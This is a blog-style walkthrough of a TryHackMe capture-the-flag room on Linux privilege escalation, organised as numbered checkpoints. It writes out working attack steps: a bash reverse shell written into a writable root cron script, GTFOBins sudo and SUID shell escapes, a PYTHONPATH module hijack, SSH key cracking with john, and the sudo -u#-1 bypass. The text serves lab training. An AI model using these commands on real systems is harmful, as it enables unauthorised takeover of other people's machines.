Linux Privilege Escalation

Hello people this write-up is about how to escalate privilege in Linux.

When we solve CTF room, we face a challenge to escalate privilege to same or higher privilege users after getting initial access to the system.

In this article, I describe where and how we find flaws in Linux systems, how to use them, and why an attacker might want to do so.

GTFOBINS– It is an online utility that provides us shell commands for Sudo or SUID bit set stander binary like (zip, find, less, vim, python, rb, etc)

Link:https://gtfobins.github.io/#

Simply go to the site, type “binary” in the search field, and you will see shell commands for sudo, SUID, and normal shell.

For instance, see the example in blow. I’m explaining it because in order to use checkpoints 4, 5, we’ll need shell instructions for binaries to move forward.

For this topic, I get a good CTF room in tryhackme, which cover almost possible condition to escalate privilege in the Linux system.

In addition to information on LPE, this room contains core Linux principles and information on encoding and decoding. Before attempting to solve this puzzle, you should be familiar with file and directory searching, several file reading methods, fundamental encoding and decoding, picture file analysis to uncover hidden data, and utilising commands to launch various executable file types.

Tryhackme room: Linux Agency

The Contents of the Room:

• Task :1 Deploy The Machine
• Task 2: Let’s jump in
• Task 3: Linux Fundamentals
• Task 4: Privilege Escalation

Log in using the credentials on task 2 in the above:

The connection’s established like in the above:

Task 3: Linux Fundamentals

On task 3 we’ll continue from mission1 to mission30, and also have already found mission1 after the connection. The last part on this task is to find viktor’s flag.

missionX is username, and missionX{md5 value} is password for the next login like in the below:

In order for you folks to better understand, we now solve the puzzle and provide examples at each checkpoint.

Where and How:

• Check Point1: we should search the password file or read all files present in the current user file system, which contains the password of any other user. If we get any other user password, we simply change user using the su command.

Now we move on to Task3 using the checkpoint1 concept and start solving the room.

User- mission1 to mission11 we get the password file of the next user a in present user file system. I am solving a few user flag rest of you guys solve himself.

Appling linux fundamental get mission flags which is password of next mission user.

Import pty;pty.spawn(‘/bin/bash’)

• Check Point 2: If we did not get any file that contains another user password we move the checkpoint 2 concepts. At this point we check /etc/hosts file, sometimes root user forgets to remove an important host file that is exploited by an attacker and give him another user password or access way. Now come on our task and solve mission23 user.

We cat /etc/hosts file and get mission24.com is hosted now we just send a get request with curl and analysis response, in response we get password of next user.

Now we move on mission24 in this we get an executable file simply just execute is ./bribe but we get msg “put some money in pocket and get flag we run command: export pocket=money, and now run file we get flag.

Now move on mission25, in this user does not get any directory due to path not set properly. Just set the path variable and move on mission25 directory and get the flag.

User mission26 and mission30 I am explain it you guys solve himself for better practice. Mission26 and mission27 you get image .jpg file just open it with strings command and you get the flag.

Now when we switch user mission28 we get irb command line so we just execute command for shell (go to gtfobin search irb copy shell command) and find the flag in directory same as mission22.

Now mission29 and mission30 is just grep the string in big file concept For this we just run command: cat file_name |grep –iRl ‘mission{‘ 2>/dev/null.

Now we move on task 4:

• Check Point 3: If we do not get any useful in /etc/hosts file so we move on check point 3 concepts. In this, we check /etc/crontab file. Firstly we should know what a crontab file is, so in this file root user set some executable file which is automatically execute either root or as other user after a certain time like every second after every min, hour, and day.

Now we check file permission, can we overwrite it if yes so we modify it and get access of the root or other user.

For better understanding we move on task 4 here now I have access of viktor use. We read crontab file and get /otp/scripts/47.sh file is execute every 30 sec as Dalia user.

Now we check read write permission and we get vicktor have permission so we just overwrite file with revers shell command: bash –i >& /dev/tcp/ip/port 0>&1.

Now start netcat listener in our system so after few second we get revershell user Dalia.

• Check Point 4:If we not get useful in crontab so we move on check point 4 concept. In this we check sudo permission sudo is stand for “substitute user do” for we run command: sudo –l the output of this command show us which command of file present user run as other user using “sudo –u username command” command .

For this concept come to task 4, here we have 5 users for understanding.“dalia,silvio,jordan,ken,sean” fare a few of them I solve, and the rest of you guys solve yourself.

Now I have access of dalia system now I run the command: Sudo–l And we get here we have sudo permission set “dalia may run /usr/bin/zip as Silvio” using sudo.

Now we go to gtfobin as I explain in stating take shell command for zip using sudo and run.

After getting raze access now again we check sudo permission now we get raze can sun /opt/scripts/gun-shop.py so we execute this file using sudo as jodan user. But in this system we have not permission to overwrite gun-shop.py file

so we apply the path manipulation technic. Now we get the file output “import shop module we are not present” here we can see path of shop file is not set so we create a shop.py file in /tmp/shop folder content “ import os; os.system(‘/bin/bash’)”and run command as jordan: sudo /opt/scripts/Gun-Shop.py: sudo -u jordan PYTHONPATH=/tmp/shop/ /opt/scripts/Gun-Shop.py

Rest of 4 is also same as dalia so you guys just check sudo permission and go to gtfbin and get shell command for particular binary. After getting sean access just cat /var/log/syslog.bak file you get password of Penelope user.

• Check Point 5: If we not get useful in checkpoint 4 now we move on checkpoint 5 concept. In this we find SUID bit set binary file its either root or other user run privilege set, SUID bit set binary is run as SUID set user privilege.

For finding SUID set binary file run following command

Find / -perm –u=s 2>/dev/null

Now if we get any stander binary so go to gtfobin and find shell command for this, run it and get shell.

For better understanding come to task 4 and solve penelpoe system.

Here we get base64 binary which suid bit set as maya user Now use this binary we read flag.txt file which is resent in /home/maya folder and switch user as maya.

Note- it is not part of checkpoint 5. It is just solve the next user.

After getting maya user access we get Robert user id_rsa key. Copy id_rsa with scp on your local machine, convert id_rsa into hash using /usr/share/john/ssh2john and finally crack it with john like in the below.

Use ss of network tool to monitorize ports on victim machine: ss –tulpn And we get ssh is running on port 2222 so we make connect using maya system

• Check Point 6: If we get sudo –l output is “(ALL, !root) Nopassword /bin/bash “ so most of case we can exploit it using negative id number so we can run /bin/bash as root and get root access.

Sudo –u#-1 /bin/bash.

• Check Point 7: And last we check run id command and check present user have group access so we can exploit group utility like dockers binary For this again go gtfbin and get shell command execute it and get shell.